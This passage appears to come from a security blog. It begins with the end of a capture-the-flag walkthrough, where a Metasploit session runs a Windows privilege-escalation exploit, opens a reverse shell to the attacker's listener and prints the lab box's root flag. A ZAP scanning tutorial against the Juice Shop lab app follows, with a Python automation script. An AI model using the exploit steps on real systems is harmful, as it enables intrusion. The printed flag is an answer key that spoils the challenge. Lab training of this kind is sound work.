msf5 exploit( windows/local/ms15_051_client_copy_image) > set target 1
target => 1
msf5 exploit( windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf5 exploit( windows/local/ms15_051_client_copy_image) > run
[ * ] Started reverse TCP handler on 10.10.14.36:4444
[ * ] Launching notepad to host the exploit...
[ +] Process 2052 launched.
[ * ] Reflectively injecting the exploit DLL into 2052...
[ * ] Injecting exploit into 2052...
[ * ] Exploit injected. Injecting payload into 2052...
[ * ] Payload injected. Executing exploit...
[ +] Exploit finished, wait for ( hopefully privileged) payload execution to complete.
[ * ] Command shell session 2 opened ( 10.10.14.36:4444 -> 10.10.10.9:49182) at 2020-01-11 01:17:57 +0200
whoami
whoami
nt authority\system
C:\inetpub\drupal-7.54>
root.txt is in the directory C:\Users\Administrator\Desktop; on this box the file is actually named root.txt.txt.
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c
C:\Users\Administrator\Desktop>
06 Jan 2020
Explanation
OWASP ZAP (Zed Attack Proxy) is an intercepting proxy and web application vulnerability scanner maintained as an OWASP project.
Environment
OS: Kali linux 2019.4
OWASP ZAP: v2.8.1
Target: OWASP Juice shop v9.3.1
Solution
1. Initial setup
Since it is in the official Kali repository, apt-get is all that is needed:
root@kali:~# apt-get install zaproxy
Next, launch the target application.
Here OWASP Juice Shop was started with the Vagrant setup in its repository, which assigns it the IP 192.168.33.10.
root@kali:~# git clone https://github.com/bkimminich/juice-shop.git
---
root@kali:~# cd juice-shop/vagrant/
root@kali:~/juice-shop/vagrant# vagrant up
---
Then give the Juice Shop a host name by adding the following line to /etc/hosts:
192.168.33.10 juiceshop
2. Other setup
First, open the ZAP GUI and go to “Tools” -> “Options” -> “Local Proxies”.
By default ZAP listens on localhost:8080.
Configure the web browser to use that address as its HTTP proxy, so that every request passes through ZAP.
Then switch ZAP to “Protected mode”, so that it only attacks URLs that are in scope and cannot hit unintended targets.
In protected mode the target has to be put in scope explicitly, which is done through a context in the next step.
Firefox is the recommended browser because it has no built-in XSS filter that could interfere with ZAP’s payloads.
However, this time, Google Chrome was used.
If the configuration is correct, the target URL appears in the “Sites” tree after the first request through the proxy.
Since we are in protected mode, the site has to be added to the scope through a context.
Right-click the site, then choose “Include in Context”.
There is no context yet, so click “New Context”; the context window appears.
Click “OK”.
After that, the site’s entries in the tree are marked as in scope.
3. Active scanning
Now the target is in scope.
Start the attack by right-clicking “http://juiceshop” -> “Attack” -> “Active Scan”.
The “Active Scan” tab shows the stream of requests being sent.
When the scan finishes, the findings are listed on the “Alerts” tab.
4. Saving the session
The session data can be saved with “Snapshot Session As…”, which stores the current session.
5. Generate a report
ZAP can export the findings of a scan as an HTML or XML report.
Go to “Report” -> “Generate HTML Report…”.
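The GUI steps of sections 2 to 5 (protected mode, context, active scan, alerts, HTML report) are also exposed through the ZAP API, which is how the same scan is repeated in a pipeline. The script below is an added example and not part of the original post; it assumes the Python client from the python-owasp-zap-v2.4 package, a running ZAP whose API key is passed on the command line, and the host name juiceshop from /etc/hosts above. The `zap` object is a parameter and `StubZap` is a stand-in of my own with the same method names, so the orchestration can be dry-run offline; the alert dicts in the dry run are constructed samples.

```python
import sys
import time


def connect(api_key, proxy="http://127.0.0.1:8080"):
    """Client for a running ZAP (API key from Tools -> Options -> API)."""
    from zapv2 import ZAPv2  # lazy import: the rest of the file works without the client
    return ZAPv2(apikey=api_key, proxies={"http": proxy, "https": proxy})


def wait_for(status_call, scan_id, poll=2.0, sleep=time.sleep):
    """Poll a ZAP status endpoint (percentage as a string) until it reaches 100."""
    while int(status_call(scan_id)) < 100:
        sleep(poll)


def scan_in_context(zap, target, context_name="juiceshop", policy=None, sleep=time.sleep):
    """Sections 2 and 3 via the API: protected mode, context, spider, active scan.

    Returns (context id, list of alert dicts as zap.core.alerts() returns them)."""
    zap.core.set_mode("protect")                       # attacks limited to in-scope URLs
    ctx_id = zap.context.new_context(context_name)
    zap.context.include_in_context(context_name, target.rstrip("/") + ".*")
    zap.urlopen(target)                                 # seed the Sites tree through the proxy
    wait_for(zap.spider.status, zap.spider.scan(target, contextname=context_name), sleep=sleep)
    scan_id = zap.ascan.scan(target, recurse=True, inscopeonly=True,
                             scanpolicyname=policy, contextid=ctx_id)
    wait_for(zap.ascan.status, scan_id, sleep=sleep)
    return ctx_id, zap.core.alerts(baseurl=target)


def summarise(alerts):
    """Alert count per risk level, highest risk first."""
    counts = {}
    for alert in alerts:
        counts[alert["risk"]] = counts.get(alert["risk"], 0) + 1
    return {r: counts[r] for r in ("High", "Medium", "Low", "Informational") if r in counts}


def save_report(zap, path):
    """Section 5: the same HTML report as Report -> Generate HTML Report."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(zap.core.htmlreport())
    return path


class StubZap:
    """Offline stand-in (my own, not part of zapv2) with the subset of calls used above."""
    def __init__(self, alerts):
        self.core = self.context = self.spider = self.ascan = self
        self.calls, self.progress, self.stored_alerts = [], {}, alerts
    def set_mode(self, mode): self.calls.append(("set_mode", mode))
    def new_context(self, name): self.calls.append(("new_context", name)); return "1"
    def include_in_context(self, name, regex): self.calls.append(("include", name, regex))
    def urlopen(self, url): self.calls.append(("urlopen", url))
    def scan(self, url, **kw): self.calls.append(("scan", url, kw)); return str(len(self.calls))
    def status(self, scan_id):   # each poll advances 50 %, so a scan "finishes" after two polls
        self.progress[scan_id] = self.progress.get(scan_id, 0) + 50
        return str(self.progress[scan_id])
    def alerts(self, baseurl=None): return list(self.stored_alerts)
    def htmlreport(self): return "<html><body>%d alerts</body></html>" % len(self.stored_alerts)


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # usage: python zap_scan.py <api-key> [target]
        zap, sleep = connect(sys.argv[1]), time.sleep
        target = sys.argv[2] if len(sys.argv) > 2 else "http://juiceshop/"
    else:                                       # dry run against the stub with constructed alerts
        zap, sleep, target = StubZap([
            {"risk": "High", "alert": "SQL Injection", "url": "http://juiceshop/rest/products/search"},
            {"risk": "Low", "alert": "X-Content-Type-Options Header Missing", "url": "http://juiceshop/"},
        ]), (lambda _s: None), "http://juiceshop/"
    ctx, found = scan_in_context(zap, target, sleep=sleep)
    print("context", ctx, "alerts by risk:", summarise(found))
    print("report written to", save_report(zap, "zap-report.html"))
```

The scan policy is the lever for the “Next task” below: pass the name of a policy created under Analyse -> Scan Policy Manager as `policy` to restrict or strengthen the checks instead of running the default set.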
6. Next task
This time, I could not find some of the vulnerabilities that OWASP Juice Shop has.
Next time, I will focus on each vulnerability and customize the scan policies to achieve this.